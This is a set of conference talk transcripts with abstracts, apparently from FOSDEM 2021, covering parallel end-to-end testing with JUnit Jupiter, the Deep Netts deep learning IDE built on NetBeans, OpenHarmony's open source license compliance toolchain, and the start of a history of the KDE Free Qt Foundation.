So I have prepared something: now I run it again, and you see that last time it took about 25 seconds, and now we have two tests running, but they are running in parallel. You could run many more end-to-end tests like this, depending of course on your machine, how many cores and how much memory you have, and how many components you are starting up and shutting down. It can increase the speed a lot: you see I am back down to around 15 seconds, as before, but I am running two tests in parallel. So you have a very easy way to separate this. As you've seen, I have implemented the extension as a completely separate module. You could put all of this into your own beforeEach and afterEach methods the first time, but that's not a clean separation of concerns or of the code. I think it is better to use a separate module, because that makes it easier to extract it later into a separate project which can easily be reused elsewhere. It is also possible to create several extensions: I have currently combined the database and the application into one extension, but you could make separate ones, for example one for starting and shutting down the database and another for starting and shutting down the application, and then combine them more flexibly; that depends on your use case. So let us come back to the slides. As I said, different variations of this are possible as well. If you have further questions, the Q&A session is coming up. I have some links to documentation which I strongly recommend: the user's guide; a lecture I gave last year at FOSDEM about the basics of JUnit Jupiter; the extension execution order; and of course a link to the whole code, which can be found on GitHub. Thank you very much, and see you in the Q&A session.
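The talk does not show the exact configuration used to run the tests in parallel, but one common way to switch this on with JUnit Jupiter is a junit-platform.properties file on the test classpath, roughly like this:

    junit.jupiter.execution.parallel.enabled = true
    junit.jupiter.execution.parallel.mode.default = concurrent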
|
You can write unit and integration tests in different ways, though sometimes you need higher-level tests, such as end-to-end tests, which are often hard to write. This talk will show you examples of how to write end-to-end tests in a convenient way by using the JUnit Jupiter extension mechanism with the support of Testcontainers and, as a foundation, Spring Boot. Frameworks like Spring Boot already offer very good support for writing tests and integration tests, but if you do not deploy to the cloud (like DC/OS, K8s, etc.), you might have trouble creating an appropriate test environment, in particular if several participants are needed to get your application running correctly. So, based on JUnit Jupiter, Testcontainers, and some Java code, you can write real end-to-end tests which are very helpful in several ways, and which can also be run from your IDE. There are several aspects which need to be taken care of, like how to synchronise the application and your test code, and so on.
|
10.5446/52792 (DOI)
|
Hello and welcome to the session Deep Learning IDE on top of Apache NetBeans. My name is Zoran Sevarac and I'm coming from Deep Netts, a startup building a deep learning development platform in Java that tries to simplify deep learning for non-experts. I'm a Java Champion and a member of the Apache NetBeans Project Management Committee. The main idea of how we make deep learning easy for non-experts is to put deep learning inside the IDE: all the procedures and steps you have to take while building a deep learning model are available within wizards, the project window, and visual tools that are well known to software developers, and they fall into what we know as a common IDE workflow. The entire platform is built on top of Apache NetBeans, and as a proof of concept, one of our users is a 14-year-old boy who learned Java during lockdown and, after only two months, was able to use Deep Netts to create a deep learning model for his Java-based game. You can read the full story on our blog by following the link on the right, and I'd also like to mention that the entire platform is available under a free development license. To get down to the point and show you how this is done in practice, I will show a simple image classifier, a convolutional network, which is a very basic deep learning model that will be able to recognize Duke mascot images. It will tell us whether an image contains the Duke logo or not. As you can see, there are two groups of images, one with Dukes and one with negative examples. The basic principle of how deep learning works is to give the model a set of examples and start the training procedure. By the way, the entire video is available at the link below. So this is how the main screen of the Deep Netts application looks, and in order to build this image classifier based on a deep learning model, we run the new project wizard. We start with a Deep Netts project, which we'll call Duke project. As a first step, the wizard asks us what we want to do; we say we want to classify images, and other types of machine learning tasks available are classifying data or predicting a value. The next step is to enter how many image categories we have. Here we have only two categories, Duke and non-Duke, which is well known as a binary classification problem, so we select the option with two categories. Next we select the directory which contains the training images; we have prepared this kind of training set in the Duke set, and it automatically finds the index file and the labels file, which just contain the paths to the different images. In the next step we select the size of the images, because all images have to be scaled to the same size. In this case, all images are already prepared at 64 by 64 pixels, but if they are not, you can choose different options to resize them. So this is a good example of how this wizard guides you in preparing data and performing the typical steps which are considered best practice in preparing data for deep learning, steps that might not be familiar to software developers who don't have experience with this type of task. There are also additional pre-processing options which help the learning algorithm learn better. The next step is specifying the neural network architecture, and here you can see that some parameters of the neural network are already pre-configured from the data entered in previous steps.
For example, the dimensions of the input layer correspond to the image dimensions, and since it is a classification problem, the loss function is configured, as well as the number of neurons in the output layer and the output activation function. This is how we provide predefined configuration settings for specific tasks, so the user doesn't have to know all the details about the model they are trying to build or the task they are trying to solve. So we enter the basic configuration for the convolutional network. The convolutional layer acts as a feature detector: it can learn to recognize features, that is, patterns in the image pixels. We'll use just three channels, since this is a very small network, and put 32 neurons in the fully connected layer. The next step is to configure the training and test data. For this step you can simply use the provided default, which splits the data into two parts: 70% for training and 30% for testing. This is done because we want to see how our model works with data it has not seen during training, and as in the previous step, reasonable defaults are provided. The next step is very important: you are given different parameters to tune the learning procedure. The provided values act as defaults, and if you just click Finish you will get a basic configuration for building a deep learning model. All of these settings are very easy to edit and reconfigure later in the process, and the good thing is that when you build a model for some data for the first time, you don't have to understand all the details of this configuration; just run the wizard and you get the complete configuration needed to run an initial training. What you see here now is the so-called visual machine learning workflow, which has been generated by the wizard. It includes all the steps for running the training, and you can easily access all the configuration settings entered in the wizard. For example, if we click the dataset, it opens the dataset configuration, which is given as a properties file, something very familiar to Java developers, and all the settings entered in the wizard are there. Next, the neural network architecture is specified as a JSON file, and you can very easily change layer types, image size, or anything else. In addition, there is a visual neural network architecture builder in which you can visually inspect the architecture and see the settings for each individual layer in a properties table. That makes it very easy to change some of these settings later and try out different configurations, which is a very common procedure while building a deep learning model. This box here represents the settings for the training procedure: for example, the maximum error, since the deep learning procedure consists of iteratively lowering the prediction error for the given training set in so-called epochs, and also the maximum number of epochs. Once you have all this configured, there is one more thing: the model evaluation, which corresponds to testing the model. Once you build the model, you want to see how it performs on unknown data, data that was not used for training, and this calculates classification metrics, a set of values which tell us how good the network is at classifying the images.
Now, this training file is the key to running a training, and to run it you just hit the play button in the toolbar, like you are used to doing in your software development projects. Let's check the visualization option so we can visually inspect the training procedure. At the moment this tool supports the Deep Netts deep learning framework, but there is ongoing development to support TensorFlow as well, and there will be an option to run training remotely in the cloud; for now you run trainings on your local machine. When we start the training, the log window displays what it is doing, and here we have a nice visualization: you can see how the network is fed with images, what happens in the input layer, how it applies different convolutional filters and scales down the images, and how everything is propagated through the entire network to the output. This one neuron is the output: when it is red it has a high activation and predicts that the image is a Duke, and when it is not, it means it is not a Duke. Here we have information about the training: the initial error was 0.69, and after just one epoch, one pass through the entire dataset, the error is down to 0.23 and the training accuracy is 0.97, which is 97%. Since this is a very small dataset and a small network, it trains very quickly, which shows how fast you can train a deep learning model to recognize a smaller number of training images. We can also speed things up; this is intentionally slowed down, it normally runs very fast. Here is the training graph, which shows how the value of the loss function goes down over the training iterations and how the accuracy goes up. After the training has completed, the testing or evaluation procedure is performed automatically, and it gives you some numbers down here which tell you how good the network is at predicting Duke images. As you can see, the accuracy on the training set was 0.99, and, as is common, the accuracy on the test set is a bit lower, 0.96. There is also other information, for example precision, which tells us how often the classifier is correct when it gives a positive prediction. One nice thing is that, besides giving you all these numbers, Deep Netts tells you what each of them means. Another metric is recall, which tells us, when an image actually belongs to the positive class, when it actually is a Duke image, how often the classifier gives a positive prediction. And a metric which balances precision and recall is the F score, the harmonic mean of precision and recall. All these values are derived from something called the confusion matrix: as you can see, the diagonal, the correctly classified images, covers most of the data, and only 7 images are not guessed correctly. If you want to see which images were not guessed correctly, we have a tool for that. I forgot to mention that the trained network is generated in a folder named trained networks, as this dnet file, and if you want to create a jar file you can use in your application, just right-click that dnet file and say create jar, and it will automatically generate a jar with our deep learning model.
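For reference, the classification metrics mentioned above are computed from the confusion matrix counts (true positives TP, false positives FP, false negatives FN, true negatives TN) in the standard way:

    accuracy  = (TP + TN) / (TP + TN + FP + FN)
    precision = TP / (TP + FP)
    recall    = TP / (TP + FN)
    F1        = 2 * precision * recall / (precision + recall)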
The entire training procedure is recorded in this training log file, which tells us how the model was built and gives the main information about the accuracy for a specific test set. If you want to inspect the images that were used for training, we use the image dataset explorer: when we select a specific class we can see all the Duke images used to train the network, and the negative images, which are blocks of color and colored rectangles that we use just to make sure the classifier is not reacting to just any color. We also have a tool to test the trained network against an image set: we select the trained network, select the dataset, and say test all images. Now you get a list of images from the data used for training, and for each image it shows the actual class of the image, the class that was recognized, and the output of the network. If the output of the network is higher than 0.5, the network has recognized the input image as a Duke. You can see this is a Duke, even this 0.5 image is a Duke, and this green rectangle is not a Duke. If you want to see the mistakes, the images that were not recognized correctly, we click "only false predictions" here, and we can see that some of these images, this all-white one for instance, were recognized as a Duke, which is not good. These are the ones we have to pay attention to; we may need to change some parameters and train the network better. So, as you can see, just by running one wizard and using a few tools you can build and evaluate your deep learning model and have it ready as a serialized Java object or even packaged as a jar file. Now, once you have a deep learning model, what do you do with it? You can load it in your Java application like this. How do you load a convolutional neural network? You just use the createFromFile method from the FileIO utility, then you create an image classifier and call its classify method. The ImageClassifier interface and ConvolutionalImageClassifier come from the Visual Recognition API, a standard Java API for visual recognition tasks, and the community edition of Deep Netts is used as the reference implementation of this API, a machine-learning-based Java API for visual recognition tasks. So in only two lines you load the model and perform recognition: you call the classify method and feed it an image, and you get the result as a map that contains the corresponding probability that the image belongs to the category Duke, which is 0.99 as you can see. The other option is to use the training API directly from Java code; this is an example of how it can be done without the user interface. In that case you need to know more details, and for some advanced options you need to understand more of the machine learning and deep learning workflow, but it is possible if you prefer it that way. However, it is much easier to build the model using the graphical user interface. On this GitHub repository you have the examples you have just seen, and you can download Deep Netts and try it on your own.
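A hedged sketch of the loading-and-classifying usage just described. The class and method names follow the talk's description of the Deep Netts and Visual Recognition APIs, but the exact package names and signatures may differ in the actual library, so treat this as an approximation and check the official examples.

    // Imports are indicative; exact packages depend on the Deep Netts / VisRec version used.
    import deepnetts.net.ConvolutionalNetwork;
    import deepnetts.util.FileIO;
    import javax.visrec.ml.classification.ImageClassifier;

    import java.awt.image.BufferedImage;
    import java.io.File;
    import java.util.Map;
    import javax.imageio.ImageIO;

    public class DukeRecognizer {
        public static void main(String[] args) throws Exception {
            // Load the trained convolutional network from the .dnet file
            ConvolutionalNetwork neuralNet =
                    FileIO.createFromFile(new File("DukeClassifier.dnet"), ConvolutionalNetwork.class);

            // Wrap it in an image classifier and classify an image
            ImageClassifier<BufferedImage> classifier = new ImageClassifierNetwork(neuralNet);
            Map<String, Float> results =
                    classifier.classify(ImageIO.read(new File("someImage.png")));

            // For this binary classifier the map holds the probability that the image is a Duke
            System.out.println(results);
        }
    }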
One of the questions we get very often is when to use Deep Netts, given that there are very advanced deep learning frameworks like TensorFlow, Deeplearning4j, and so on which support GPUs and distributed training. But Deep Netts is pure Java and supports the most commonly used deep learning algorithms. It is very simple and easy to integrate with an existing product, it is highly portable, it does not depend on native libraries, and it is friendly and easy to use; I think that is one of its most important features. It is much easier for an average Java developer to use and understand than any other framework out there. So I would say you should consider Deep Netts when you want to integrate deep learning into an existing software product to make it smarter, and when you don't have huge amounts of data: when you have a smaller number of specific objects to recognize, for example, so it is difficult (or simply unnecessary) to gather a large amount of training data, and you don't require a high level of generalization to deal with all possible variations of the input. In that case, with smaller models and smaller datasets, Deep Netts can learn very well and provide even higher accuracy than huge models built with the big deep learning frameworks. Also when you have hardware constraints, as in edge AI use cases, with limited CPU and memory and no specialized hardware like GPUs, Deep Netts can be an ideal solution. The main advantages of Deep Netts for these kinds of problems are that you get better accuracy with less data, you have lower CPU and memory requirements, and it is highly portable and can be integrated on every Java-enabled device, which makes it easier to build, run, and maintain. To get started, you can go to the Deep Netts getting started page and follow the instructions to download and set it up. There is good documentation, and also some examples on our blog: how to do parking lot occupancy detection, how to do cloud recognition, and many others. Thank you very much for listening to the presentation, and if you have any questions or suggestions, feel free to contact us on Twitter or any other way you like. Thank you, bye.
|
Most software developers are not also data scientists or machine learning experts. They don't know machine learning workflows, math, data analysis and model building practice, and tricks. Mastering these skills can take months or even years. Learn about the shortcut that can quickly turn a software developer into a deep learning developer: an IDE that guides you in building advanced machine learning models and deploying them into your applications.
|
10.5446/52782 (DOI)
|
Good afternoon. My name is Carlo Piana. I'm an Italian lawyer dedicated mainly to free and open source software, and today we are presenting, with my good friend and client Davide Ricci, on OpenChain and OpenHarmony: how the two play together and what we are doing to achieve, finally, conformance to OpenChain. In a moment I will hand over to Davide to introduce himself. Of course, as this is a pre-recorded statement, we are ready to answer any of your questions; I will be joined by my good friend and colleague Alberto Pianon, who is also available to take questions. Any curiosity, any question, please don't hesitate. Davide, over to you now. Thanks, Carlo. Carlo, can you see the screen? I can see your screen. Perfect. So thanks for handing it over to me. My name is Davide and I'm joining you from Milano. It's a pleasure to be here, and Carlo has invited me to present OpenHarmony, so we'll start from there; then he's going to take over and explain OpenChain in more detail and how the two work together. I'm the director of the Open Source Technology Center at Huawei. I have a Master of Science in computer engineering, with a focus on artificial intelligence and robotics, and I spent 15-plus years in open source at Wind River. Wind River was part of Intel and worked very closely with the Intel Open Source Technology Center at that time. Throughout my career I've been a bit of everything, from Linux kernel developer to field application engineer, product manager, director of product management, and general manager of open source platform teams, and in this capacity I now run the Open Source Technology Center at Huawei. I have contributed to many open source projects, including the Yocto Project, the Zephyr project, OpenChain, and the Open Virtualization Alliance, and I've worked with the Eclipse community and used the Eclipse IDE for my open source products in the past and plan to use it in the future. So what is OpenHarmony? OpenHarmony is meant to be an operating system, a software stack across all consumer devices; the idea is to build an edge-to-cloud operating system. It was initially developed by Huawei under the brand name HarmonyOS, and it is being progressively contributed to the open source community under the brand name OpenHarmony. The goal is to leverage the broadest possible spectrum of open source components, and as you know, each open source component carries its own copyright and license, and license-dictated obligations. The idea is to deliver on the promise of autonomous, cooperative devices: once we integrate existing kernels and open source components together, and every consumer device in a household shares the same operating system, you can start developing and enabling interesting things, such as devices knowing that each other exists, devices understanding what applications they need to fulfill together, and devices collaborating with one another to fulfill an application. The example I typically use at this point: suppose you're doing a multimedia Zoom call, like the one we're recording this talk on, and you start it from your phone. Your phone detects that there are OpenHarmony devices running in the house, namely a TV with a 4K display, the microphone on your phone, and a Dolby surround speaker system.
The phone and the application will then ask you if you want to run in an optimized way, which means leveraging the display of the 4K TV for the best experience possible, leveraging the microphone of your phone because it's close to your mouth and your voice, and leveraging the surround speakers of your Dolby system because that's where the audio is best processed. So the idea is to integrate as many open source components as possible to build this ultimate vision of intelligent, cooperating consumer devices. The initial code has been donated in China; you can find it on Gitee under OpenHarmony. In Europe we are effectively developing the European version of it, which initially has slightly different requirements, for instance in the way we cooperate with partners by leveraging the open governance of existing foundations, and certainly in making IP compliance and FOSS compliance one of the top priorities. The idea is that by March (I have a bit of a roadmap later) we're going to be donating the first code base to the first set of European customers and partners, and the first official release of the project will come out in November 2021. So why must FOSS compliance come first, why open source, why myself after so many years in the open source community, and why is open source strategic to Huawei? Well, it is strategic to Huawei for multiple reasons. Number one, it breaks vendor lock-in: effectively, no company is locked into the technology provided by another company, wherever those companies are located. It also means that all of our products are built upon technology that is shared by most of our customers and partners as well. If it's done right, and I underline the fact: if it's done right, it increases the brand value for Huawei. It also means that all eyes are on us to do it right; it's expected, but if it's not done right, with all eyes on us, that's going to be a problem. And doing it right means putting FOSS compliance and IP compliance first. I was one of the initiators of the OpenChain project back when I was in the States; I think it was 2015, if I'm not mistaken. Coming from a software-as-a-product mindset, I know that having a policy that captures roles, responsibilities, and processes for dealing with components of an open source nature is paramount to assessing the risk of releasing a product and doing something with that risk. At the end of the day it's about business decisions, and business is best done when the risks are calculated and managed. So OpenChain, FOSS compliance, and IP compliance policies allow whoever is about to release an open source product to know exactly where the risks are and to take the right decisions. I lead the Open Source Technology Center, an open source group that has been built by Huawei in Europe, leveraging talent across the various R&D centers that Huawei has in Europe. Right now we have people in Milan like myself, Munich, Warsaw, Helsinki, London, Cork, and Lyon, as well as R&D personnel in India. The Open Source Technology Center is run as a business unit, because software has become core and strategic, since open source is strategic to Huawei. So we're running it as an R&D group, but we have engineering functions, marketing, product management, field engineering, evangelism, and yes, IP compliance, an audit group, and so on.
And of course, the first big project, as I mentioned, is OpenHarmony, right, to take it to Europe. A bit of timing, and a bit about the team that is working on FOSS compliance, before I hand it back over to Carlo. So as I said, the OSTC was founded at the beginning of 2020, so we've been spending time staffing the key functions and building up the team that you've seen some faces from in the slide before. Building processes and infrastructure: one of those processes is IP compliance, and the infrastructure is, for instance, a compliance scanning toolchain based on ScanCode and Fossology. Carlo will talk more about that. Then, before you launch an open source project in any location, you do a market analysis, you understand your partners and the market needs. In September, the first technology became available from HarmonyOS to OpenHarmony from China. Since then, we've been onboarding partners and we've been assessing the technology, understanding the readiness for the launch in the European market, building a DevOps infrastructure, preparing the code. And then in September, at the same time, we started the activity around license compliance. And a bit more info on that: you know, just going back to September, we started by looking at the policy. Once the policy was somehow sketched, we started training personnel, because one of the important points of OpenChain compliance is training for personnel. At the same time, we started setting up a DevOps toolchain for IP compliance: any component that we bring in is, you know, scanned, then its license is determined, and then if there's a risk, it's flagged. So we do this continuously, as early as possible, release early, release often. We don't keep, you know, IP compliance and FOSS compliance as an afterthought. As you can see, it's done since the very beginning. This led us to the generation of the first bill of materials, so the analysis and creation of the manifest of all the components that we have integrated, with their license. And then once it's done, it's about tweaking, right? This is never done: you start early, but it is never done, because you have to tweak the policy, new OpenChain specifications become available, you update the policy, you train new personnel, you make the BOM better, you update the toolchain and the DevOps pipeline. So it's about continuous improvement over time. It's something where, if you start early, you minimize the risk, but you cannot stop. You have to keep training and improving, right? There's no, you know, there's no staying the same. It's about either getting worse or getting better. So we definitely want to get better at this. With this, introducing the IP compliance project for OpenHarmony: Carlo, I'll stop presenting and I'm going to hand it over back to you. Oh, thank you, Davide. That was really interesting. I've seen this already, but any time it's all the more fun. So we decided to present this introduction so that you know what the scope of the project is, and also the magnitude of the project and therefore the task that's at hand for us, and also the stage of development. So as Davide has said, this is something that comes from the very beginning, thinking about open source compliance and OpenChain conformance. So this presentation is not just to praise us for how good we are and what we have achieved, but rather to expose ourselves to criticism, possibly, and, by all means, to be sort of forced to be delivering what we are promising.
So this is not a one off thing is something that we plan to redo maybe next year, maybe the year after. So in a bit of more formal context, this is to my reckoning, the first time that we are seeing a new operating system or all the more a new open source operating system being developed in the full open since day one. When strategic decision are still liquid, everything is possible. Therefore, I cannot but praise the decision to get us on board since the beginning. The fact that we are interacting with the development team not just to ensure compliance as an exposed, but helping devising the whole process in the beginning. It's something that we believe is a prime for a project, at least of this magnitude and so ambitious. So in my understanding, and from my experience as well, conformance and compliance are usually done later in the process by retrofitting an environment where compliance were delayed to a later stage of maturity. I myself, when myself and my colleague Alberto have been summoned to a compliant process, we perceived that our intervention was kind of seen as a necessary perhaps, but an annoyance or a source of delay. This is different. This is a long preamble to just say this is not the grand finale of a success story, is not an epic journey, is not the depiction of the battle over the Pelinore fields. It is rather maybe a number of zero of a series that we trust will be, if not entertaining, at least interesting and somewhat instructive. So out of metaphor, as I said, we plan to be back and reporting you, but for the time being, we have the secret ambitions to be setting an example for other projects as to what it is possible to do even for a corporate sponsor, like large projects, which is directed at satisfying an entire wide industry from IoT to entertainment devices to smartphone. But that now some juice. First, what? What we are making possible, we're making public. And as David said, pretty much everything. And by pretty much everything, as I said, things that normally get done are not exposed, like the guts of the process, the entire project will be exposed. And all the more, Huawei is even going to donate the entire project to a newly formed working group within a well-respected and independent foundation. So the project in this new incarnation will inherit what we're doing now. And it's important to stress that since Huawei is going to be also a client of this new form, newly formed working group, no effort will be spared by it to make sure that also the project upstream is conformant to Open Chain as Huawei OSDC wants to be. So it's well playing both sides of the net. The when is also important. As I said, from the beginning, we are making available everything as they become available to us. So for the first bit has been the policy and in future, we have many things in the world. Some of that are house bake, off-credits. Some of them are more advanced. So bear with me. Policy first. This is not finalized too, but it's quite advanced. We have decided to, and you can find it, there is a link in the slides, we have decided to separate the public part with something more company specific, but we shifted pretty much the everything to the public side. Also the implementation base. So you will find there, of course, the overarching rules, the principles and the roles. And as they become available also, the many, many of the things that the roles, the interplay between the very various actors and so on and so forth. 
Other things, on privacy concerns mainly, will not be made public, like the actual names of who has gone through compulsory education and so on. But the rest will be, and is already, somewhat public. Now the forward-looking part, something that you are not yet able to see, but you will be seeing in the near future. So the toolchain is built on two main building blocks, which are ScanCode and Fossology. One might wonder why we are using two things that are often perceived as covering more or less the same ground. We have extensive experience in using Fossology. We have even, I and mainly my colleague Alberto Pianon, developed a tool set to complement Fossology for compliance work. And we have been pointed to ScanCode, which is also very good. And when deciding which one to use, we decided to use both. Because one complements the other: in some cases ScanCode has better results, sometimes Fossology has better results. But combining them together, we are feeding in more quality information and we cross-check what we find from the actual automated scans. We have worked with the NOI Techpark of Bolzano to make this available directly in a CI pipeline in GitLab. So everything should be, and already is, working, and it is working by making everything public. And I am showing you in a second how this is being implemented. So this is quite difficult to read because it is made with PlantUML, but I am trying to explain to you what you are seeing here. We have basically five different actors. One is developers, of course. There is a GitLab CI pipeline. This is the most interesting bit: it is a Fossology wrapper, something that does things that are fed into Fossology, which is the fourth. And of course, as OpenChain mandates, there is an audit team that follows and takes the decisions. So first, we have some triggering events, like committing on a master branch or using a new tag, whatever. This is yet to be decided; it will be decided. And this triggers the CI pipeline. The CI pipeline just provides package sources and metadata. And this is the place where the most interesting bits happen. Of course, the sources are uploaded to Fossology and made available for scanning. The developer triggers running the built-in scanners in Fossology. And at the same time, ScanCode runs, and ScanCode will pass the results to Fossology through an SPDX file, which is slightly changed. And this is also very important: we have a database of past decisions. So we are reusing decisions that we have made in the past, and possibly that we have imported from other sources. We will come to that in a few minutes. All of this is, of course, fully automated. But it doesn't end with that. Of course, Fossology outputs its own report as a raw report. And the wrapper adds information and consolidates it: Fossology establishes licensing down to the single file level, and we are condensing it and making information available as to the project, the package. So we are presenting information at the package level. Additionally, this is not a pipeline that has a pass/non-pass. Ideally, the pipeline doesn't stop further adding of new commits. But at the same time, it outputs information for the developers that makes evident what the status of the package analysis is. So we use status badges. These are yellow because there has been no final decision, no assertion, because this is just the result of automated scans, and it's not yet ready for shipping. So the developer knows what the status is, but this package, this project, is not ready to ship in this form. What is missing?
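To make that wrapper step a bit more concrete, here is a minimal sketch, under stated assumptions, of what the automated part could look like: run ScanCode over the package sources, condense the per-file findings to a package-level summary, and mark the result with a provisional yellow badge. This is not the actual OSTC toolchain described in the talk; the script, the JSON field names and the badge logic are illustrative assumptions, and the exact output schema depends on the scancode-toolkit version in use.

```python
# Hypothetical wrapper step: run ScanCode over a package's sources, condense the
# per-file license findings to a package-level summary, and mark the result with
# a provisional "yellow" badge until an auditor records a concluded license.
# Field names follow recent scancode-toolkit JSON output and may differ by version.
import json
import subprocess
from collections import Counter
from pathlib import Path


def scan_package(src_dir: str, report: str = "scancode-report.json") -> dict:
    # scancode-toolkit CLI; --license, --copyright and --json-pp are upstream options.
    subprocess.run(
        ["scancode", "--license", "--copyright", "--json-pp", report, src_dir],
        check=True,
    )
    return json.loads(Path(report).read_text())


def summarize(report: dict) -> dict:
    license_expressions = Counter()
    for entry in report.get("files", []):
        # Assumed field name; older releases expose a per-file "licenses" list instead.
        expression = entry.get("detected_license_expression_spdx")
        if expression:
            license_expressions[expression] += 1
    return {
        "license_candidates": license_expressions.most_common(),
        "badge": "yellow",          # automated results only, no human assertion yet
        "concluded_license": None,  # to be filled in by the audit team
    }


if __name__ == "__main__":
    print(json.dumps(summarize(scan_package("package-sources/")), indent=2))
```

In a setup like this it is the audit team's recorded decision, not the scanner output, that would eventually flip the badge to green; the scanner only proposes candidates.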
The missing part is the human decision. No package will be out without human interaction and human decision. So the audit team is notified and prompted to look into the raw report and to make decisions, which will depend on the case. In the next part, if no new commits have occurred in the intervening time, the audit team just launches the pipeline again after having provided the necessary information and decisions. So the pipeline is run again. And of course, if there is nothing new, no new versions, and by new versions I mean no new major versions, because we're not just making a one-to-one comparison to say whether the hash is identical. We assume that if no new major version of the package has been added and no big variations in the licensing occur, the package is the same. So we can reuse the decisions where they have been made, and a new SPDX is generated. And this time it runs again, and this time you see a lot of green and blue, meaning that all the files in the package have been processed, the SPDX is available, and we have concluded this package is Apache 2.0. This is not enough yet, because this is at the package level. But a package can have many or several licenses applicable, depending on the decisions you make at compile time. Plus, this does not tell everything about the interaction of this package with other packages, possibly with copyleft obligations. So you need to do another step, which is generating a graph of dependencies. In our experience, from our point of view, you can do it only at build time, because only when you have a completely built version of the package do you know what counts. And the best way we have found so far is to do a binary analysis. Also because SPDX cannot store abstract dependencies of the package in a native way, and so in a machine-readable way. And this is why we have devised a tree for storing and reusing this information. And this leads me to another bit, which is quite important, and bear with me, because this is something for which we need advice, perhaps, or we need a contribution. So I said that we reuse the results of our scans and decisions, but since OpenHarmony uses Yocto, and Yocto is built for making an entire distribution, many other packages are just called in. They are inserted, and they also need to be scrutinized. And there is a lack of information on these decisions from the outside, and it's difficult to find this. ClearlyDefined is there for that, but they have a very different focus. So we are planning to use already reliable, very reliable information from, for instance, Debian, to present a curated database that comes from reliable sources, is processed by us, and will be made available, under a CC, Creative Commons, license, by ourselves, and maybe also contributed upstream to a project, maybe ClearlyDefined. And this is going to be fully SPDX compliant, and ready, with a few transformations, to be fed into Fossology. And if you know of other efforts, if you know of other comparable initiatives, or have suggestions, please, by all means, bring them up. Very quickly, because we're running out of time, we are also committing to REUSE. REUSE is a project of the Free Software Foundation Europe, and is a standard for declaring copyright statements in a standardized way, so that for your own software you are telling, with a clear voice and one single language, what is the license applicable to your own software.
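As a concrete illustration of what the REUSE specification asks for, a single source file carrying its own machine-readable copyright and license declaration could look like the sketch below. The contributor name, year and license choice are made up for the example; under REUSE the full license texts live in a LICENSES/ directory of the repository, and the reuse command-line tool (for instance `reuse lint`) can check a whole tree against the specification.

```python
# SPDX-FileCopyrightText: 2021 Example Contributor <contributor@example.org>
#
# SPDX-License-Identifier: Apache-2.0

"""Trivial module showing per-file REUSE-style copyright and license tags."""


def greet(name: str) -> str:
    """Return a small greeting, just so the file contains some real code."""
    return f"Hello, {name}!"
```

Declarations of this kind are what make the downstream scanning and decision reuse described above cheaper, because the tooling can read the licensing intent straight from each file instead of guessing it.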
And we are, on the one hand, trying to convince, and to lead by example, our downstream implementers to also use this for their own projects. And the second bit, since we are convinced that this is one of the ways to go for easing up compliance, is to do the same and propose, as a pull request to our upstream, to also use this as their foundation. So this is something we still have to decide, it's just an idea, but we are happy to hear your comments. This has been, I think, a quite comprehensive view of what we have so far and what we plan to do. And of course we are, as I said, ready to take your questions, your comments, perhaps some of them have already been answered. And I hand over to Davide for the final bye bye. Thank you. Thank you, Carlo, and thank you, everybody. It was a pleasure to speak at FOSDEM again. Any questions, you guys know where to find us. And with this, I think, you know, that's it. Adios, bye bye. Thanks very much. Bye.
|
OpenHarmony is a new operating system stewarded by Huawei's Open Source Technology Center, with Array as advisor. With compliance, governance and transparency prioritized, OpenChain was the natural backdrop for it. Rather than embracing open source only to exploit it, with transparency and compliance as a last-minute afterthought, the OSTC has made them central pillars from the very beginning. We take the opportunity to present to you how the goal of OpenChain conformance helped. Born as an internal project, since its conception OpenHarmony's future has been to live in an independent, respected foundation that will receive all the tools for keeping it a truly community-driven operating system. The tools that will be donated include a compliance toolchain with source code scanning, compliance policy documents and roles, a Bill of Materials for the initial release and many other artifacts, to make sure compliance is not a one-off exercise, but an ongoing commitment for the entire life of the project. Full conformance with OpenChain is projected in the short-term future, and it is surely a motivation to start with the right steps and to make the right choices from the very beginning of the project.
|
10.5446/51220 (DOI)
|
Welcome to this presentation, which is part of FOSDEM 2021. My name is Cornelius Schumacher, and I would like to tell you the story of the KDE Free Qt Foundation. This is a pretty unique construction in the KDE and Qt community, which is meant to provide a means beyond the licenses to protect the freedom of the underlying software, which is used by the KDE community and the Qt community. So this presentation will show you where this was coming from, how it works, and also what lessons we learned there, and how you could apply that maybe to other situations. Let's get started with a few words about myself. I'm a KDE contributor since 1999. I got into this project because a co-worker of mine was following the relevant newsgroups, he was following what was happening around Linux and other free software projects, and he was interested in this desktop thing. And there was a mailing list where these questions were discussed, and he pointed me to this new project, KDE. So it took me a bit, but I had a look. I found it interesting, found it technically interesting, technically challenging. So I started to write my first patch. And yeah, that's where it started. I'm still there. I started with contributing quite a bit of code, writing all kinds of applications. I maintained KOrganizer. That was my first step into this enterprise, where I maintained this application. And from then, I did more development, but I also got into the governance part. In 2003, I joined the KDE Free Qt Foundation as a representative of KDE for two years. And later, I also was elected into the board of KDE e.V. That's the foundation behind the KDE project. We'll talk about this in this presentation a bit later. And I was there, a board member, for nine years. And a couple of years of that, I also was the president. My job during all that time was somewhere in the Linux industry. Today, my current job is open source steward at DB Systel. That's the IT subsidiary of Deutsche Bahn, the German railway company. And my job there is to help teams to contribute to open source software and especially also to use open source software. To understand the story, we have to start at the beginning. In 1996, this was the year when Windows PCs were quite common. Wintel had 95% of the PC market. Lots of people were using such computers: the Wintel, the Windows on Intel processors. The current version of Microsoft Windows was Windows 95 back then. Windows NT also was around. We also had Unix workstations and Unix systems. Quite a bunch of them, a number of Unix systems, different Unix vendors. And they had something there which was called the Common Desktop Environment. This was a shared project between different vendors to create the user interface for Unix workstations. It worked. It was heavy. It was a pretty enterprise-style project. People on Unix workstations used it; some of them might even have liked it. At that time also, Linux continued its successful development. The kernel version 2.0 was released. Also the Linux distributions, they gained traction. Slackware already was around for quite some time. Debian, Red Hat and SUSE joined that crew. And they distributed a lot of free software along with the Linux kernel to their users. And one thing which is important to note there is that during this time, and through this way of Linux distributions, a lot of end users got in contact with free software running on the Linux kernel, but of course expanding into many more projects and full solutions. A lot of that.
